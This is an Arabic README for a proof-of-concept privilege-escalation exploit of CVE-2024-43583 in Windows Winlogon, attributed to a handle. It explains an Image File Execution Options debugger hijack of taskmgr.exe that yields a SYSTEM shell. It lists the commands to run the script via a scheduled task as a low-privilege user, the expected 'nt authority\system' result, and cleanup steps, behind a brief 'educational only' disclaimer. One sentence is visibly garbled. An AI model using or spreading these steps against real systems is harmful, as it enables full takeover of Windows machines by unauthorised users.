
إثبات المفهوم لـ CVE-2024-43583
المؤلف: No0B@ckSappi3 إنستغرام: No0BackSappi3
CVE-2024-43583 هو ثغرة تصعيد امتيازات تؤثر على مكوّن Winlogon في مايكروسوفت. استغلال هذا الخلل يسمح لمستخدم منخفض الامتيازات بتصعيد صلاحياته إلى SYSTEM، مما يؤدي إلى اختراق كامل للنظام.
يستخدم هذا المفهوم الإثباتي (PoC) تقنية اختطاف المصحح (Debugger Hijacking) عبر مفتاح التسجيل Image File Execution Options (IFEO) في ويندوز لاستبدال عملية نظام شرعية بحمولة خبيثة.
إصدارات ويندوز المتأثرة
Windows 10 (1507 - 22H2) Windows 11 (21H2 - 24H2) Windows Server 2008 SP2 - 2022
هذا الاستغلال لأغراض تعليمية وبحثية فقط. لا تستخدمه على أنظمة غير مصرح بها. قد يكون إساءة استخدام هذا الاستغلال غير قانوني.
تأكد من تثبيت Python على النظام المستهدف. إذا لم يكن مثبتًا، استخدم النسخة المُجمّعة .exe.
python poc-43583.py
schtasks /create /tn "LowPrivExploit" /tr "C:\Path\To\python.exe C:\Path\To\poc-43583.py" /sc once /st 00:00 /ru lowpriv /f
schtasks /run /tn "LowPrivExploit"
Ctrl + Shift + Esc). إذا نجح الأمر، ستظهر شل SYSTEM بدلاً من ذلك.بمجرد تشغيل الاستغلال، تحقق من صلاحياتك:
whoami
المخرجات المتوقعة:
nt authority\system
أعد تشغيل السكربت واختر الخيار [2] لإزالة الاختطاف.
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /f
schtasks /delete /tn "LowPrivExploit" /f
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"